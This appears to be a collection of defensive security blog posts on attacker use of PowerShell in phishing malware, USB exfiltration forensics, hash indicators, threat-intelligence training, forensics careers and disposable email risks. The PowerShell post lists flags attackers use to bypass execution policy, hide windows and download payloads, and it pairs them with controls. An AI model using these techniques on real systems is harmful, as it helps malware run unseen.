PowerShell : Tool for Admins and Adversaries

Readers!

From last couple of weeks I have been doing some analysing of malware. Mostly, are via phishing attempts. What our adversaries are doing is to first gain easy access to the machine via phishing and creating background processes that calls the compromised domains that downloads the executable, packed with malicious payload. Below is basic timeline of a phishing email with attachment.

timeline

The technique is neither new or unique, however if we are to come up with a trend we can see that most of them have similar tools and procedures.One such tool is PowerShell. The blog is not about what PowerShell is, but how our adversaries are using the tool that was just created to automate admin tasks within Windows environment. As automation is was one of the key points PowerShell was given scripting. The scripting allows to automate admin tasks such as configuration management etc. Here I go explaining what PowerShell is.

Microsoft definitely didn’t intended the tool to be security aware, and therefore till this date one can use PowerShell to perform malicious activities. However, certain controls or functionality within PowerShell can assist us in controlling type of scripts that can run on the systems.

There are indeed multiple security controls that we will discuss later in the blog but first let’s see what our adversaries are doing. I will not be going in specific analysis of a malware as I am trying to reach out to the teams which are responsible to detect/prevent these type of attacks by placing feasible and actionable security controls with regards to PowerShell.

Below is a sample PowerShell command seen in most cases :

ps-command

Frequently used parameters :

  1. ExecutionPolicy bypass – Execution policies  in  PowerShell determines whether a script can run and what type of scripts can run and also sets default policy. Microsoft added a Flag called ‘bypass’, which when used bypasses any currently assigned execution policy and runs the script without any warnings. There are 4 types of Execution policies:
    1. Restricted
    2. Unrestricted
    3. AllSigned
    4. RemoteSigned
  2. windowstyle hidden – This parameter is used when PowerShell script requires to be run in background without the users knowledge.
  3. noprofile – PowerShell profile are set profile or commands (it is actually a PowerShell script), normally for current user and host. Setting -noprofile will just launch any script and will not look for profiles.
  4. DownloadFile – For downloading the file via web

Tools, Technique and Procedures:

  1. The attachments as shown in the first screenshot, are mostly Word/Excel doc with Macros or zip files with JavaScripts.
  2. The Macros or JS are heavily obfuscated and sometimes lightly. For heavily deobfuscated scripts I rely on dynamic analysis(the best way to know what malware is written for). Some scripts, due to practice, I can deobfuscate within minutes.
  3. PowerShell command to download the file are mostly on sites with HTTP rather on HTTPS (there are some sophisticated adversaries created/compromised HTTPS websites). Sometimes, also have noticed use of cmd.exe /c being used which will invoke specified command and terminates it.
  4. File on the compromised domain are mostly windows executables with ‘.exe’ or sometimes the extension is hidden. This depends on the adversary and the packers that they have used. Sometimes, you can unpack the ‘exe’ via 7zip.
  5. Based on the commands the file will be first downloaded and executed. In certain cases I have seen the file gets deleted after execution. Again, it depends on the command.
  6. Most malwares that I have analysed were either ransomware or trying to steal information and sometimes combination of both.

Above TTPs are very simple to understand however, implementing security controls, lets say for each steps to detect and prevent, is much harder. We as a team or individual are working towards reducing the impact of the incident. Consider the phases of cyber kill-chain and perform an analysis of incidents within your team, and understand at which phase you are able to catch the adversary and can you do that earlier?

Observables such as IP addresses, domains, URLs and file hashes with context are the IOCs that normally we look for and use it for detection and prevention. Some people call that Threat Intelligence. Darwin would have gone here Seriously?

download

Security controls such as Endpoint solutions, Proxy, IDPS and FW can help us but they are heavily dependent on what they know and history has shown us that they can be bypassed. However, they are indeed very good controls to either reduce the impact and/or preventing the known attacks or IOCs.

What we need is security controls based on TTPs. So let’s see some of the following controls that can be implemented to either detect and/or prevent such attacks :

  1. DO NOT give admin privileges to the local account. If required based on their role give have a Admin pass generator with User Access Control (UAC) enabled, that will prompt to enter password for Administrator every time a system change such as installing a program, running an Admin task etc is created.
  2. Group policies to have certain tasks especially script execution and writing to registry and windows directory only allowed by Administrator. Can use Administrative Templates.
  3. Group policy to not allow any executables in TEMP directory to be saved/executed.
  4. Sign all PowerShell script. If not possible or the team not willing to sign at restriction placed via above mentioned points can assist.
  5. Can also set the Execution Policy to Restricted, PowerShell can only be used interactively to run the script. Organisation who are not pushing any policies via PowerShell can choose this option.
  6. Application whitelisting – Windows AppLocker. The tools can assist to define what level of access a user can have on the system with regards to executables, scripts and DLLs.
  7. Having AppLocker in Allow Mode can assist the team with a rule that only scripts at trusted location can run on the system. A attacker can re-write the rule provided, he/she has access on the system with Admin privileges.
  8. PowerShell Language Mode – Admin can setup the language modes to Constrained Language Mode that permits all Windows cmdlets and all Windows PowerShell language elements, but it limits permitted types. It has list of types that are allowed within a PowerShell script. For example, New-Object type cmdlet can only be used with allowed types which does not contain system.net.webclient.
  9. Logging of PowerShell is also important. Here, in my opinion Sysmon is a must have. The logs can be forwarded to SIEM for correlation. If Sysmon is not feasible, enabling PowerShell Module logging is highly recommended. Enhanced logging is always recommended and will  write another blog on that.
  10. Organisation proxy to be configured properly to detect/prevent web request invoked via PowerShell. Have tested with command Invoke-request that can show WindowsPowerShell within User-Agent. However, no User-Agent string is noted when above mentioned to DownloadFile is used. May be Proxies can be configured to disallow any traffic without User-Agent – still have to verify whether such functionality exists. If not a SIEM rule can be used to alert on web traffic that has no User-Agent string, going to external sites and downloading files.

Please note, that AppLocker and Powershell constrained mode are not security feature but another layer of defense which can help to reduce the impact of the attack and in some cases completely prevent the execution of foreign scripts.

When making a business case to the board or C-Level executives to make any changes in the organisation the presenter should use language they understand. As part of the evidence it highly recommended to show actually incidents where current security controls failed which impacted the productivity of the user, loss of data and hours spent to recover and restore systems. They want to know how any new mentioned or suggested changes will help in reducing impact to the user or business.

If there are other methods that other organisations are using please let me know.

A good read – PowerShell for Blue Team

 

Finding Evidence of Data Exfil – USBStor artefacts

Readers!

Last year one of the member on SANS DFIR posted a question with regards to identifying whether there was any data leakage occurred in the environment via a USB thumb drive. As for the evidence investigator had USBStor artefacts. Shell bag analysis(TZ Works sbag) showed a large number of files touched (reg-UTC) within a very short time period and a few with the MRU (Most recently used list) flag set with different times.

This blog is a concise article of the tips provided by myself and other members. Provided tips assisted the investigator to support the theory of data leakage.

  1. Evaluating USB dates as a group.  If any number of artefacts is detected with the same exact time stamp, investigate it further. Having such artefacts indicates that they were somehow modified. It is also, worth the effort to carve the data for deleted registry files and look for relevant keys there.
  2. Normal users will/may access the files again after copying to any removable media to make sure the files were copied correctly and are not corrupted. This operation leaves shell items in the form of shell bags and link (.lnk) files. One can use Windows Time Rule to for evidence of file copy. Using the time rule examine the link files with target data pointing to files on removable media (tz works ‘lp’ is excellent for this). If the modified date of the target file data in the link file precedes the created date of the target file data in the link file, then this is an indication that the file was opened from the removable media, after the file was copied to the removable media. This means that even without access to the removable media, you can state that files were copied to the removable media and then they were opened from the removable media. The created date of the target data in the link file is when the file was copied to the removable media. One can state that the files were copied, but cannot state where the file was copied from, as that is not tracked.
  3. Now to determine when the file was opened from the removable media, look at the times of the link file itself. The created date of the link files will be the first time the file was opened and the modified date of the link file will be last time the file was opened. To discover the removable media, locate the volume serial number of the removable media’s file system which will be stored in the link file’s data. Correlate the volume serial number to the data from your USB drive analysis and you will get the manufacturers unique serial number for that removable media. Find that unique serial number across your enterprise and you will discover other machines where that drive was connected to. Correlate the link file target data to the shell bag data and you should be able to get a neat timeline of what happened on the system.
  4. Memory analysis of the system can assist. If the files were copied it should have data on the clipboard. Drag and drop will not likely have any artefacts.
  5. Registry hives –  one can use FTK registry viewer for ease. Usbstor have last written values – dates when the last device was accessed or connected.
  6. Look at the recent files in Windows section. Although if one is not able to open the file it may show which file from which volume – it may not prove that file was copied however if the document name is ‘organisationconfidential‘ than you can argue what was the file doing on USB? The link files should also contain volume serial that one can match/compare with removable media serials.
  7. Registry restore points can also be used to check last written dates.
  8. Look at the MFT records – they have sourceMFT and destinationMFT.

Tools mentioned : SBE – Shellbag Explorer and MFTparser

Links mentioned :

https://files.sans.org/summit/Digital_Forensics_and_Incident_Response_Summit_2015/PDFs/PlumbingtheDepthsShellBagsEricZimmerman.pdf

 

Hash Values – A Trivial Artefact

Readers!

Merry Christmas and Happy new year to all. The days of holiday spam and vendor predictions are here.

Here I am spending summer afternoon watching TV and writing on my blog. As I am bit lazy during holidays I am posting something simple. The post is about HASH values and how trivial they are in identifying malicious files/programs.

You can read about Hash here.

Hash values are important to first verify the files. Think of it as a signature or footprint. As living beings has a signature or footprint that we can recognise them from, similarly files  have something called digital footprint that we can identify them from.

Take example of HashCalculator. Following screenshot shows different hash values of HashCalc.exe.

hashcalc

As you can see HashCalc provides lot of information (digital footprint) of its own. With regards to security the hashes are normally used to verify the file as mentioned earlier. Let’s look at the output in brief for commonly used hash values :

  • MD5 – Based on Message Digest algorithm. Normally represent as 32 hexadecimal digits. Vulnerable to collision attacks. Read further here.
  • SHA-1 – Secure Hash Algorithm 1. Represented as 40 digit hexadecimal digits. Generates 160 bits message digest. Vulnerable to collision attacks. No longer in use and has been replaced by SHA-2 and SHA-3. Read further here.
  • SHA-256 – Secure Hash Algorithm 2. Represented as 64 digit hexadecimal digits. Generates six digests – SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256. Read further here.

Now, why the blog entry. The information is available on google and Wikipedia. Reason for the blog is Hash values are considered trivial/important in Threat Intelligence and/or cyber security world. Lots of OSINT, vendor intelligence systems share hash values of known malware dropper. This could be an executable, MS office document, Adobe document, image files etc.

Following are few scenarios where Hash values can assist :

  • Hash values can assist in identifying whether the file/program that we have is legitimate or not.
  • Lot of malware analysis blogs will always provide Hash value of identified file/program.
  • The Hash value is also used by Endpoint solutions to detect known malicious files/programs.
  • During Incident Response, one can also use Hash values in YARA rules to detect any malicious files/programs.
  • Organisations can have a list of program with the Hash values of known good  and authorised programs in their organisation, which than can be used to identify any unwanted programs on the system, either via endpoint for real time detection and/or during incident resposne. Benchmarking/Baselining is a complicated process and sometimes not feasible in large organisations.

NIST provides list of known good hash values of legitimate programs, that one can use to compare good vs bad. Read here.

Hash values are just another indicator that gives more targeted detection of malicious files/programs. IP address and URLs are dynamic, not 100% reliable and have low confidence level as a Threat Indicator and therefore Hash values is considered important artefact in Security world.

Happy Holidays!

 

SANS FOR578 Cyber Threat Intelligence – Course Review

Readers!!!

Advanced greetings for Christmas. Before I start make sure to check out SANS Holiday Hack Challenge here.

Recently, I was honoured to attend one of the SANS course For578 – Cyber Threat Intelligence. SANS instructor was one of the best in business Robert M. Lee. My reason to attend SANS training is purely because they are one the best security training provider, and when they announced FOR578 last year I was very keen in SANS take on Threat intelligence. I have been self-learning about threat intelligence via Lockheed Martin, various webcasts via SANS and other providers and realised that every vendor has different approach with Threat Intelligence.

I had prior knowledge Threat Intelligence and this course helped to me to get the best out of it.

After the end of the first day, I was having a very good understanding with what Intelligence is and how it is associated with Cyber Threats. Most of the time, in name of Threat Intelligence, vendors or service providers end up sharing Threat Indicators with some nice dashboards and portray the system as Threat Intelligence system. I have always been saying we need to move beyond Indicators based systems (yes its still good to have those), and concentrate more on Tools, Techniques and Procedures of our adversary. The content of the course actually aligned with my thinking and helped in better carve my thinking and actually implement in real life.

During the course, I learned how to track a threat actor or a campaign and how to best showcase that information across your organisation. Tools such as CRITS, MISP, Threat_note were used. Kill-Chain model and Diamond Model were explained in detailed and LABS were designed in way to implement these models.

One of the interesting LAB was to review vendor Threat Intelligence report. The report could be regarding a APT, analysis of an threat actor or generic briefings across the global related to Cyber Threats. In this exercise, we learned about biases and how multiple input to one single report may change the actual outcome of the report or identification of adversary.

Other LABS were related to extracting intelligence out of vendor reports, tracking a campaign and what artefacts to collects during intelligence exercise and how to provide evidence to your hypotheses. LABS that concentrated in how to share Threat Information via STIX, YARA and OpenIOC. The course has very good real life case studies with regards to Thr

At the end of the fifth day, I knew what actual Threat Intelligence means and how we can use that in our organisation.

For those who are thinking to take the course, would highly recommend to take it.

Evoltin POS Malware – Kill Chain Mind Map

Readers!!!

Its been quite a while I have updated my blog posts, due to me spending  some quality time off the work and being with family.

Recently, was honoured to attend SANS FOR578 Cyber Threat Intelligence course taught by Robert M. Lee and it was excellent. I will be writing a separate blog post reviewing the course later.

Being on customer service environment, I have realised how important data visualisations are. When you are presenting your findings to C Level Executives, having tables, charts and graphics in the report, makes it easier to grasp and understand analyst ( or whoever wrote the report) point of view. We can visualise our findings about Organisational Risks, Threats, Incidents and many other departmental attributes in different manner.

For me, best visualisation is Mind Maps and I have used them to represent process, procedure, incidents etc. I also, use mind maps, when I am performing any investigations on incidents during IR, Forensics and/or Threat Hunting. It helps me track investigation steps and my findings. If the incident continues or the next business day, the mind map, helps me to start where I left, and also helps me trace back my steps rather looking at excel sheets or other textual representation or a case management system.

During the course, there was a good stress on making sure investigation or intelligence gathering information is represented in a manner that all levels of audience can understand. This is when I thought to create a mind map of a malware and its behaviour and how it can be represented on Kill Chain phases.

evoltin-pos-aka-nitloveposb

Above screenshot shows Kill Chain phases for Evoltin POS Malware and indicators that were identified during analysis and how they can associated to different Kill Chain phases. Rather presenting them on table or chart format, I believe the view via mind map is much more easy to grasp and better presented.

I will be creating more mind maps and uploading to my GitHub account. I normally, update IOC’s to Alienvault OTX, Blueliv, GitHub and ThreatConnect, but now I will also create similar Kill Chain Mind Map for every investigation I do.

Happy Mind Mapping!!!!!

Forensics – Where to start and What to know

Readers

I would like to share my experience and understanding with regards to forensics and where I started to get a foothold in forensics.

Questions that I normally get : I want to get into forensics. What should I study? What kind of certificates are good? What background should I have? 

By this blog I will answer those question based on my experience. I will not dwell into explaining what forensics is and why do we perform that. For that you can just google it and/or read my blog entry – Incident Response and Forensics : The Two Towers. Understand Forensics is considered a specialised field, meaning one must have prior knowledge of fundamentals in operating systems, networking, packet analysis, incident handling etc.

For me I started in Technical Support – this is first due to I was a student and second technical support guys will go through numerous issues and fix through out the day which can be extended into Forensics investigation. For example, a user calls into saying my system is working slow – a tech support guy will first investigate why and provide solution/workaround based on the findings. This helped in understanding system internals especially Windows. One must understand how an operating system works – their processes, services, kernel level attributes etc. A very good link to start is here for windows, here for MacOSX and here for linux. I will be creating mind map for this and will provide them on my github account.

Certificates such as SANS GCFE will give you insights on windows operating system forensics. Individuals thinking of this course should read on here.

Other courses and comparison can be viewed here.

We obviously need tools to perform forensics. There are numerous tools available to perform forensics based on what is required. SANS has their own linux distribution SIFT and further information can be found here.

There is also a debate, that System Admins are the best Forensic examiners or investigators and I don’t agree with that statement. Yes system admins have knowledge of system, however that’s mostly into hardening and fixing an issue. Rarely security aspect is covered in System Admin side. System Admin will still need to learn and/or go through training (self or class based) and understand how their experience overlaps in forensics.

To gain a bit more knowledge about networking, incident handling, packet analysis I dwelled into SOC (security operations centre). This allowed me to understand how operating system communicates to other operating systems, network and/or external systems. In SOC, I was responsible to identify anomalies, develop SIEM content to identify incidents within network and/or operating system from a known bad behaviour. This allowed me understand what is a good behaviour. All operating system logs events and one must understand what is the meaning of those and in what situations they are triggered, and how one can use these events in identifying an unauthorised activity and/or unusual behaviour for example. This knowledge, during forensics, allowed me to investigate the operating system and/or infected host in different manner. Yes, Forensics and Incident Response overlaps and are two sides of the same coin. I always took initiatives and that helped me in the field.

To understand how Forensics should be performed one must also understands standards and RFC. Understanding these standards allowed me to grasp how corporate world and/or any forensics practice should perform forensics and how that can be integrated in Incident Response. Have a read here for NIST publication, here for RFC and here for NIST Mobile forensics publication.

This will be a good start to for individuals interested in Forensics. One should also dive into the operating system they normally use at work/home on their laptop/desktop and go through system. For Windows, work on PowerShell, look at the event viewer, services, use Sysinternal Tools. Fire up wireshark and/or Chrome net internals to see what happens when you access a website. Note down whatever is considered a normal behaviour. For linux/Mac look at the logs under directory /var/logs.

Lastly, read the blogs that are forensics and incident response related which will give a good insight in using tools, how forensics is performed and current methodologies and type of investigations.

Few Forensics Blogs :

Another point, I will raise is certifications are not the only way you will understand or gain more knowledge in Forensics. Your practice and dedication in self-learning and implementing on a regular basis will help a lot. But, also in corporate world these certifications are considered an entry point and it is advisable to get them. I have done SANS certifications (I am not advocating them and/or advertising SANS for personal gain, just sharing my personal experience), and I believe they concentrate on fundamentals and have better content with related to topics that are covered in any certifications.

I will be providing more links on the up coming mind map. I will also be providing any Forensic and/or IR investigations that I perform, at my home lab including tools usage.

Happy Forensicating!!!!!

Disposable email addresses (DEA) and concerns

Readers

This post is about disposable email addresses and where to get them and concerns for organisations or whitehats defending their network/country. Disposable email addresses are something for which you don’t need an account. Understand you can only RECEIVE emails and cannot SEND. The service was first paid only but now you can get it for free from multiple locations. The email lasts from 10 minutes to a week.

Disposable email addresses are something that you can register on a site that you think you won’t be visiting often and may send you spam later or you want to hide your identify when registering. Depending on the person who is using the service, it can used in positive and/or negative ways.

 Let’s start looking at them :

  1. AirMailScreen Shot 2016-09-12 at 9.54.05 PM.png
  2. Guerrilla Mail guerilla email.png
  3. ThrowAwayMailScreen Shot 2016-09-12 at 9.50.28 PM.png
  4. MailinatorScreen Shot 2016-09-12 at 9.53.32 PM.png
  5. Temp MailScreen Shot 2016-09-12 at 9.55.35 PM.png
  6. myTemp.emailScreen Shot 2016-09-12 at 9.57.25 PM.png
  7. Email on deckScreen Shot 2016-09-12 at 9.56.36 PM.png

There are others but the mentioned ones are top hits.

As having background in Social engineering and identifying tactics that cyber criminals  and/or insiders may use with regards to this disposable email, I can think of a 2 concerns.

  1. Partners in crime can use these for their communications rather than to worry about getting tracked and/or reveal the identity of the recipient.
  2. Another concern is insiders and  how one can use the disposable emails to transfer data and/or for data exfiltration. Organisations should be on lookout of these channels or medium and can configure mail gateway and/or DLP to make sure no sensitive/confidential information is going out.

If you know other concerns please comment.

Lets hope the service is being used for good purpose.